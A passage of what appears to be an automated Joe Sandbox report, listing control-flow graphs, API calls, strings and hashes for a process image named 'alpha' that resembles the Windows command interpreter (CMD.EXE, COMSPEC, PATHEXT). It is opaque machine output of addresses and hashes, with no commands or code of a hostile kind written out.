7ff7823e01b8 849->856 857 7ff7823eeb4b-7ff7823eeb65 call 7ff7823d3240 call 7ff7823f8530 call 7ff7823e4c1c 849->857 850->825 851->833 867 7ff7823eeb15-7ff7823eeb1f call 7ff7823e4c1c 853->867 859 7ff7823e396f 854->859 860 7ff7823e39b9-7ff7823e39bb 854->860 880 7ff7823eeb71-7ff7823eeb82 _setmode 856->880 881 7ff7823eeb87-7ff7823eeb89 call 7ff7823e86f0 856->881 857->856 868 7ff7823e3972-7ff7823e397d 859->868 863 7ff7823eeb20 860->863 864 7ff7823e39c1-7ff7823e39c3 call 7ff7823e4c1c 860->864 863->848 877 7ff7823e39c8 864->877 867->863 874 7ff7823e397f-7ff7823e3984 868->874 875 7ff7823e39c9-7ff7823e39de call 7ff7823ddf60 868->875 874->868 883 7ff7823e3986-7ff7823e39ae call 7ff7823e0580 GetConsoleOutputCP GetCPInfo call 7ff7823e04f4 874->883 875->867 891 7ff7823e39e4-7ff7823e39e8 875->891 877->875 880->881 888 7ff7823eeb8e-7ff7823eebad call 7ff7823e58e4 call 7ff7823ddf60 881->888 897 7ff7823e39b3 883->897 902 7ff7823eebaf-7ff7823eebb3 888->902 891->850 895 7ff7823e39ea-7ff7823e39ef call 7ff7823dbe00 891->895 900 7ff7823e39f4-7ff7823e39fc 895->900 897->860 900->874 902->850 903 7ff7823eebb9-7ff7823eec24 call 7ff7823e58e4 GetConsoleOutputCP GetCPInfo call 7ff7823e04f4 call 7ff7823dbe00 call 7ff7823e0580 GetConsoleOutputCP GetCPInfo call 7ff7823e04f4 902->903 903->888
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: QueryThread$ConsoleInfoOpenOutputVirtual$CloseCurrentHeapInformationLocaleValue_setjmpmemset
                                                                                                  • String ID: DisableCMD$Software\Policies\Microsoft\Windows\System
                                                                                                  • API String ID: 2624720099-1920437939
                                                                                                  • Opcode ID: 9a4cddc928fe4c71fd6c761995599b2788caccd561f5d3a8cbf937f1688b90ea
                                                                                                  • Instruction ID: a6f30f1346a20e5f13098fd28a7f24ccb631e9ec35c6971847cb159746e7c9a2
                                                                                                  • Opcode Fuzzy Hash: 9a4cddc928fe4c71fd6c761995599b2788caccd561f5d3a8cbf937f1688b90ea
                                                                                                  • Instruction Fuzzy Hash: 58C1AC25F086429AE750BB61E4602B8FBA0FF49712FF4417CD91E57E91DEBCA848C630

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 1118 7ff7823e823c-7ff7823e829b FindFirstFileExW 1119 7ff7823e82cd-7ff7823e82df 1118->1119 1120 7ff7823e829d-7ff7823e82a9 GetLastError 1118->1120 1124 7ff7823e8365-7ff7823e837b FindNextFileW 1119->1124 1125 7ff7823e82e5-7ff7823e82ee 1119->1125 1121 7ff7823e82af 1120->1121 1122 7ff7823e82b1-7ff7823e82cb 1121->1122 1126 7ff7823e83d0-7ff7823e83e5 FindClose 1124->1126 1127 7ff7823e837d-7ff7823e8380 1124->1127 1128 7ff7823e82f1-7ff7823e82f4 1125->1128 1126->1128 1127->1119 1129 7ff7823e8386 1127->1129 1130 7ff7823e82f6-7ff7823e8300 1128->1130 1131 7ff7823e8329-7ff7823e832b 1128->1131 1129->1120 1133 7ff7823e8332-7ff7823e8353 GetProcessHeap HeapAlloc 1130->1133 1134 7ff7823e8302-7ff7823e830e 1130->1134 1131->1121 1132 7ff7823e832d 1131->1132 1132->1120 1135 7ff7823e8356-7ff7823e8363 1133->1135 1136 7ff7823e8310-7ff7823e8313 1134->1136 1137 7ff7823e838b-7ff7823e83c2 GetProcessHeap HeapReAlloc 1134->1137 1135->1136 1140 7ff7823e8315-7ff7823e8323 1136->1140 1141 7ff7823e8327 1136->1141 1138 7ff7823f50f8-7ff7823f511e GetLastError FindClose 1137->1138 1139 7ff7823e83c8-7ff7823e83ce 1137->1139 1138->1122 1139->1135 1140->1141 1141->1131
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ErrorFileFindFirstLast
                                                                                                  • String ID:
                                                                                                  • API String ID: 873889042-0
                                                                                                  • Opcode ID: 9fa4dae725f9512e7002593702cffe0a246d57342299abf5542ad382d0469498
                                                                                                  • Instruction ID: b32cb9b1789d78b8746b107b373b1966d490181b8ff92c530f75a6c4013879fa
                                                                                                  • Opcode Fuzzy Hash: 9fa4dae725f9512e7002593702cffe0a246d57342299abf5542ad382d0469498
                                                                                                  • Instruction Fuzzy Hash: 67516179A09B42D6E710AF12E4541B9FBA0FB49B92FE48575CA1D43B60CFBCE854C720

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 1142 7ff7823e2978-7ff7823e29b6 1143 7ff7823e29b9-7ff7823e29c1 1142->1143 1143->1143 1144 7ff7823e29c3-7ff7823e29c5 1143->1144 1145 7ff7823ee441 1144->1145 1146 7ff7823e29cb-7ff7823e29cf 1144->1146 1147 7ff7823e29d2-7ff7823e29da 1146->1147 1148 7ff7823e29dc-7ff7823e29e1 1147->1148 1149 7ff7823e2a1e-7ff7823e2a3e FindFirstFileW 1147->1149 1148->1149 1150 7ff7823e29e3-7ff7823e29eb 1148->1150 1151 7ff7823ee435-7ff7823ee439 1149->1151 1152 7ff7823e2a44-7ff7823e2a5c FindClose 1149->1152 1150->1147 1153 7ff7823e29ed-7ff7823e2a1c call 7ff7823e8f80 1150->1153 1151->1145 1154 7ff7823e2ae3-7ff7823e2ae5 1152->1154 1155 7ff7823e2a62-7ff7823e2a6e 1152->1155 1156 7ff7823e2aeb-7ff7823e2b10 _wcsnicmp 1154->1156 1157 7ff7823ee3f7-7ff7823ee3ff 1154->1157 1159 7ff7823e2a70-7ff7823e2a78 1155->1159 1156->1155 1160 7ff7823e2b16-7ff7823ee3f1 _wcsicmp 1156->1160 1159->1159 1162 7ff7823e2a7a-7ff7823e2a8d 1159->1162 1160->1155 1160->1157 1162->1145 1164 7ff7823e2a93-7ff7823e2a97 1162->1164 1165 7ff7823ee404-7ff7823ee407 1164->1165 1166 7ff7823e2a9d-7ff7823e2ade memmove call 7ff7823e13e0 1164->1166 1168 7ff7823ee40b-7ff7823ee413 1165->1168 1166->1150 1168->1168 1170 7ff7823ee415-7ff7823ee42b memmove 1168->1170 1170->1151
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 449607d8b30cf2fcca0a8811105e09d4af6f68671a5f8fd8d6b2897c28d3601c
                                                                                                  • Instruction ID: cf0fda47ae1fcaca37bf2931e3d9f99129344a985fc304028f76123f4d90d015
                                                                                                  • Opcode Fuzzy Hash: 449607d8b30cf2fcca0a8811105e09d4af6f68671a5f8fd8d6b2897c28d3601c
                                                                                                  • Instruction Fuzzy Hash: 51516D25B0868195EB30AF15E5142BAE690FB54BA1FE44239DE6D07FD0DF7CE449C710

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 732 7ff7823e3c24-7ff7823e3c61 733 7ff7823eec5a-7ff7823eec5f 732->733 734 7ff7823e3c67-7ff7823e3c99 call 7ff7823daf14 call 7ff7823dca40 732->734 733->734 736 7ff7823eec65-7ff7823eec6a 733->736 743 7ff7823e3c9f-7ff7823e3cb2 call 7ff7823db900 734->743 744 7ff7823eec97-7ff7823eeca1 call 7ff7823e855c 734->744 738 7ff7823e412e-7ff7823e415b call 7ff7823e8f80 736->738 743->744 749 7ff7823e3cb8-7ff7823e3cbc 743->749 750 7ff7823e3cbf-7ff7823e3cc7 749->750 750->750 751 7ff7823e3cc9-7ff7823e3ccd 750->751 752 7ff7823e3cd2-7ff7823e3cd8 751->752 753 7ff7823e3ce5-7ff7823e3d62 GetCurrentDirectoryW towupper iswalpha 752->753 754 7ff7823e3cda-7ff7823e3cdf 752->754 756 7ff7823e3fb8 753->756 757 7ff7823e3d68-7ff7823e3d6c 753->757 754->753 755 7ff7823e3faa-7ff7823e3fb3 754->755 755->752 759 7ff7823e3fc6-7ff7823e3fec GetLastError call 7ff7823e855c call 7ff7823ea5d6 756->759 757->756 758 7ff7823e3d72-7ff7823e3dcd towupper GetFullPathNameW 757->758 758->759 760 7ff7823e3dd3-7ff7823e3ddd 758->760 763 7ff7823e3ff1-7ff7823e4007 call 7ff7823e855c _local_unwind 759->763 762 7ff7823e3de3-7ff7823e3dfb 760->762 760->763 765 7ff7823e3e01-7ff7823e3e11 762->765 766 7ff7823e40fe-7ff7823e4119 call 7ff7823e855c _local_unwind 762->766 774 7ff7823e400c-7ff7823e4022 GetLastError 763->774 765->766 770 7ff7823e3e17-7ff7823e3e28 765->770 775 7ff7823e411a-7ff7823e412c call 7ff7823dff70 call 7ff7823e855c 766->775 773 7ff7823e3e2c-7ff7823e3e34 770->773 773->773 776 7ff7823e3e36-7ff7823e3e3f 773->776 777 7ff7823e3e95-7ff7823e3e9c 774->777 778 7ff7823e4028-7ff7823e402b 774->778 775->738 783 7ff7823e3e42-7ff7823e3e55 776->783 780 7ff7823e3ecf-7ff7823e3ed3 777->780 781 7ff7823e3e9e-7ff7823e3ec2 call 7ff7823e2978 777->781 778->777 779 7ff7823e4031-7ff7823e4047 call 7ff7823e855c _local_unwind 778->779 799 7ff7823e404c-7ff7823e4062 call 7ff7823e855c _local_unwind 779->799 788 7ff7823e3ed5-7ff7823e3ef7 GetFileAttributesW 780->788 789 7ff7823e3f08-7ff7823e3f0b 780->789 793 7ff7823e3ec7-7ff7823e3ec9 781->793 784 7ff7823e3e66-7ff7823e3e8f GetFileAttributesW 783->784 785 7ff7823e3e57-7ff7823e3e60 783->785 784->774 784->777 785->784 791 7ff7823e3f9d-7ff7823e3fa5 785->791 794 7ff7823e3efd-7ff7823e3f02 788->794 795 7ff7823e4067-7ff7823e4098 GetLastError call 7ff7823e855c _local_unwind 788->795 797 7ff7823e3f1e-7ff7823e3f40 SetCurrentDirectoryW 789->797 798 7ff7823e3f0d-7ff7823e3f11 789->798 791->783 793->780 793->799 794->789 801 7ff7823e409d-7ff7823e40b3 call 7ff7823e855c _local_unwind 794->801 795->801 804 7ff7823e3f46-7ff7823e3f69 call 7ff7823e498c 797->804 805 7ff7823e40b8-7ff7823e40de GetLastError call 7ff7823e855c _local_unwind 797->805 803 7ff7823e3f13-7ff7823e3f1c 798->803 798->804 799->795 801->805 803->797 803->804 815 7ff7823e40e3-7ff7823e40f9 call 7ff7823e855c _local_unwind 804->815 816 7ff7823e3f6f-7ff7823e3f98 call 7ff7823e417c 804->816 805->815 815->766 816->775
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _local_unwind$AttributesCurrentDirectoryErrorFileLasttowupper$FullNamePathiswalphamemset
                                                                                                  • String ID: :
                                                                                                  • API String ID: 1809961153-336475711
                                                                                                  • Opcode ID: db7a8accf24e76443df151eec26ec66c8909a5ebe3ef3b4491d16ca320e82ff4
                                                                                                  • Instruction ID: eea14582b966939e525daddcb7a96133027dc7a1bd3874831c9cbf8c375002a0
                                                                                                  • Opcode Fuzzy Hash: db7a8accf24e76443df151eec26ec66c8909a5ebe3ef3b4491d16ca320e82ff4
                                                                                                  • Instruction Fuzzy Hash: 74D1943660CB85A1EA60EB15E4642B9F7A1FB84742FD04179DA4E43FA4DFBCE449C720

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 914 7ff7823e2394-7ff7823e2416 memset call 7ff7823dca40 917 7ff7823ee0d2-7ff7823ee0da call 7ff7823e4c1c 914->917 918 7ff7823e241c-7ff7823e2453 GetModuleFileNameW call 7ff7823e081c 914->918 923 7ff7823ee0db-7ff7823ee0ee call 7ff7823e498c 917->923 918->923 924 7ff7823e2459-7ff7823e2468 call 7ff7823e081c 918->924 929 7ff7823ee0f4-7ff7823ee107 call 7ff7823e498c 923->929 924->929 930 7ff7823e246e-7ff7823e247d call 7ff7823e081c 924->930 937 7ff7823ee10d-7ff7823ee123 929->937 935 7ff7823e2483-7ff7823e2492 call 7ff7823e081c 930->935 936 7ff7823e2516-7ff7823e2529 call 7ff7823e498c 930->936 935->937 944 7ff7823e2498-7ff7823e24a7 call 7ff7823e081c 935->944 936->935 941 7ff7823ee125-7ff7823ee139 wcschr 937->941 942 7ff7823ee13f-7ff7823ee17a _wcsupr 937->942 941->942 945 7ff7823ee27c 941->945 946 7ff7823ee181-7ff7823ee199 wcsrchr 942->946 947 7ff7823ee17c-7ff7823ee17f 942->947 955 7ff7823ee2a1-7ff7823ee2c3 _wcsicmp 944->955 956 7ff7823e24ad-7ff7823e24c5 call 7ff7823e3c24 944->956 949 7ff7823ee283-7ff7823ee29b call 7ff7823e498c 945->949 950 7ff7823ee19c 946->950 947->950 949->955 953 7ff7823ee1a0-7ff7823ee1a7 950->953 953->953 954 7ff7823ee1a9-7ff7823ee1bb 953->954 958 7ff7823ee264-7ff7823ee277 call 7ff7823e1300 954->958 959 7ff7823ee1c1-7ff7823ee1e6 954->959 964 7ff7823e24ca-7ff7823e24db 956->964 958->945 962 7ff7823ee21a 959->962 963 7ff7823ee1e8-7ff7823ee1f1 959->963 969 7ff7823ee21d-7ff7823ee21f 962->969 965 7ff7823ee1f3-7ff7823ee1f6 963->965 966 7ff7823ee201-7ff7823ee210 963->966 967 7ff7823e24dd-7ff7823e24e4 ??_V@YAXPEAX@Z 964->967 968 7ff7823e24e9-7ff7823e2514 call 7ff7823e8f80 964->968 965->966 970 7ff7823ee1f8-7ff7823ee1ff 965->970 966->962 971 7ff7823ee212-7ff7823ee218 966->971 967->968 969->949 973 7ff7823ee221-7ff7823ee228 969->973 970->965 970->966 971->969 975 7ff7823ee254-7ff7823ee262 973->975 976 7ff7823ee22a-7ff7823ee231 973->976 975->945 977 7ff7823ee234-7ff7823ee237 976->977 977->975 978 7ff7823ee239-7ff7823ee242 977->978 978->975 979 7ff7823ee244-7ff7823ee252 978->979 979->975 979->977
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: memset$EnvironmentFileModuleNameVariable_wcsuprwcschr
                                                                                                  • String ID: $P$G$.COM;.EXE;.BAT;.CMD;.VBS;.JS;.WS;.MSC$COMSPEC$KEYS$PATH$PATHEXT$PROMPT$\CMD.EXE
                                                                                                  • API String ID: 2622545777-4197029667
                                                                                                  • Opcode ID: bd59c29d01747683900c9969ab54c99ddb5983c61e93a73bd4a825f93bf20993
                                                                                                  • Instruction ID: cb338761042c7bd0f67f347705d5db74958590520d1d20d3bb95bcab9aeff1ba
                                                                                                  • Opcode Fuzzy Hash: bd59c29d01747683900c9969ab54c99ddb5983c61e93a73bd4a825f93bf20993
                                                                                                  • Instruction Fuzzy Hash: 7891B325B1964295EE64BF11D8602F8A7A0FF48B96FE44179C90E07E95DFBCE948C330

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ConsoleMode_get_osfhandle
                                                                                                  • String ID: CMD.EXE
                                                                                                  • API String ID: 1606018815-3025314500
                                                                                                  • Opcode ID: 9863d994e227a964b461aa116ba59a1d246fb461d9866754b2e1da54715f6750
                                                                                                  • Instruction ID: a74c0930e76aad206f73b3067b884e16ca9d25f029c008ff24f959ef251b67dd
                                                                                                  • Opcode Fuzzy Hash: 9863d994e227a964b461aa116ba59a1d246fb461d9866754b2e1da54715f6750
                                                                                                  • Instruction Fuzzy Hash: 90410E35A09602DBE7446B15E854178BFA0FB8A753FF89178C91E477A4DFBCA848C630

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 992 7ff7823dc620-7ff7823dc66f GetConsoleTitleW 993 7ff7823dc675-7ff7823dc687 call 7ff7823daf14 992->993 994 7ff7823ec5f2 992->994 998 7ff7823dc68e-7ff7823dc69d call 7ff7823dca40 993->998 999 7ff7823dc689 993->999 997 7ff7823ec5fc-7ff7823ec60c GetLastError 994->997 1000 7ff7823ec5e3 call 7ff7823d3278 997->1000 1004 7ff7823ec5e8-7ff7823ec5ed call 7ff7823e855c 998->1004 1005 7ff7823dc6a3-7ff7823dc6ac 998->1005 999->998 1000->1004 1004->994 1007 7ff7823dc954-7ff7823dc95e call 7ff7823e291c 1005->1007 1008 7ff7823dc6b2-7ff7823dc6c5 call 7ff7823db9c0 1005->1008 1013 7ff7823dc964-7ff7823dc972 call 7ff7823d89c0 1007->1013 1014 7ff7823ec5de-7ff7823ec5e0 1007->1014 1015 7ff7823dc9b5-7ff7823dc9b8 call 7ff7823e5c6c 1008->1015 1016 7ff7823dc6cb-7ff7823dc6ce 1008->1016 1013->997 1026 7ff7823dc978-7ff7823dc99a towupper 1013->1026 1014->1000 1020 7ff7823dc9bd-7ff7823dc9c9 call 7ff7823e855c 1015->1020 1016->1004 1019 7ff7823dc6d4-7ff7823dc6e9 1016->1019 1022 7ff7823ec616-7ff7823ec620 call 7ff7823e855c 1019->1022 1023 7ff7823dc6ef-7ff7823dc6fa 1019->1023 1038 7ff7823dc9d0-7ff7823dc9d7 1020->1038 1028 7ff7823ec627 1022->1028 1027 7ff7823dc700-7ff7823dc713 1023->1027 1023->1028 1033 7ff7823dc9a0-7ff7823dc9a9 1026->1033 1029 7ff7823ec631 1027->1029 1030 7ff7823dc719-7ff7823dc72c 1027->1030 1028->1029 1035 7ff7823ec63b 1029->1035 1034 7ff7823dc732-7ff7823dc747 call 7ff7823dd3f0 1030->1034 1030->1035 1033->1033 1036 7ff7823dc9ab-7ff7823dc9af 1033->1036 1045 7ff7823dc8ac-7ff7823dc8af 1034->1045 1046 7ff7823dc74d-7ff7823dc750 1034->1046 1043 7ff7823ec645 1035->1043 1036->1015 1039 7ff7823ec60e-7ff7823ec611 call 7ff7823fec14 1036->1039 1041 7ff7823dc872-7ff7823dc8aa call 7ff7823e855c call 7ff7823e8f80 1038->1041 1042 7ff7823dc9dd-7ff7823ec6da SetConsoleTitleW 1038->1042 1039->1022 1042->1041 1053 7ff7823ec64e-7ff7823ec651 1043->1053 1045->1046 1052 7ff7823dc8b5-7ff7823dc8d3 wcsncmp 1045->1052 1049 7ff7823dc752-7ff7823dc764 call 7ff7823dbd38 1046->1049 1050 7ff7823dc76a-7ff7823dc76d 1046->1050 1049->1004 1049->1050 1056 7ff7823dc773-7ff7823dc77a 1050->1056 1057 7ff7823dc840-7ff7823dc84b call 7ff7823dcb40 1050->1057 1052->1050 1058 7ff7823dc8d9 1052->1058 1059 7ff7823dc80d-7ff7823dc811 1053->1059 1060 7ff7823ec657-7ff7823ec65b 1053->1060 1065 7ff7823dc780-7ff7823dc784 1056->1065 1078 7ff7823dc856-7ff7823dc86c 1057->1078 1079 7ff7823dc84d-7ff7823dc855 call 7ff7823dcad4 1057->1079 1058->1046 1061 7ff7823dc9e2-7ff7823dc9e7 1059->1061 1062 7ff7823dc817-7ff7823dc81b 1059->1062 1060->1059 1061->1062 1069 7ff7823dc9ed-7ff7823dc9f7 call 7ff7823e291c 1061->1069 1067 7ff7823dc821 1062->1067 1068 7ff7823dca1b-7ff7823dca1f 1062->1068 1070 7ff7823dc83d 1065->1070 1071 7ff7823dc78a-7ff7823dc7a4 wcschr 1065->1071 1074 7ff7823dc824-7ff7823dc82d 1067->1074 1068->1067 1073 7ff7823dca25-7ff7823ec6b3 call 7ff7823d3278 1068->1073 1089 7ff7823ec684-7ff7823ec698 call 7ff7823d3278 1069->1089 1090 7ff7823dc9fd-7ff7823dca00 1069->1090 1070->1057 1076 7ff7823dc8de-7ff7823dc8f7 1071->1076 1077 7ff7823dc7aa-7ff7823dc7ad 1071->1077 1073->1004 1074->1074 1081 7ff7823dc82f-7ff7823dc837 1074->1081 1083 7ff7823dc900-7ff7823dc908 1076->1083 1084 7ff7823dc7b0-7ff7823dc7b8 1077->1084 1078->1038 1078->1041 1079->1078 1081->1065 1081->1070 1083->1083 1091 7ff7823dc90a-7ff7823dc915 1083->1091 1084->1084 1092 7ff7823dc7ba-7ff7823dc7c7 1084->1092 1089->1004 1090->1062 1095 7ff7823dca06-7ff7823dca10 call 7ff7823d89c0 1090->1095 1096 7ff7823dc917 1091->1096 1097 7ff7823dc93a-7ff7823dc944 1091->1097 1092->1053 1098 7ff7823dc7cd-7ff7823dc7db 1092->1098 1095->1062 1114 7ff7823dca16-7ff7823ec67f GetLastError call 7ff7823d3278 1095->1114 1099 7ff7823dc920-7ff7823dc928 1096->1099 1102 7ff7823dca2a-7ff7823dca2f call 7ff7823e9158 1097->1102 1103 7ff7823dc94a 1097->1103 1100 7ff7823dc7e0-7ff7823dc7e7 1098->1100 1105 7ff7823dc932-7ff7823dc938 1099->1105 1106 7ff7823dc92a-7ff7823dc92f 1099->1106 1107 7ff7823dc800-7ff7823dc803 1100->1107 1108 7ff7823dc7e9-7ff7823dc7f1 1100->1108 1102->1014 1103->1007 1105->1097 1105->1099 1106->1105 1107->1043 1112 7ff7823dc809 1107->1112 1108->1107 1111 7ff7823dc7f3-7ff7823dc7fe 1108->1111 1111->1100 1111->1107 1112->1059 1114->1004
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ConsoleTitlewcschr
                                                                                                  • String ID: /$:
                                                                                                  • API String ID: 2364928044-4222935259
                                                                                                  • Opcode ID: 2d0f60311dbb7cb4575a21d0706b761dc6d692f27382b916cf53a40b82970273
                                                                                                  • Instruction ID: 3b5060f0f0f338e586d6c412f36b98331510e08dcf1ea8091f1c33eb779f6140
                                                                                                  • Opcode Fuzzy Hash: 2d0f60311dbb7cb4575a21d0706b761dc6d692f27382b916cf53a40b82970273
                                                                                                  • Instruction Fuzzy Hash: A8C1E361E2864291EA54BB25D4287BDE2A1FF40B82FF44979DD1E47AD1DFBCE844C320

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
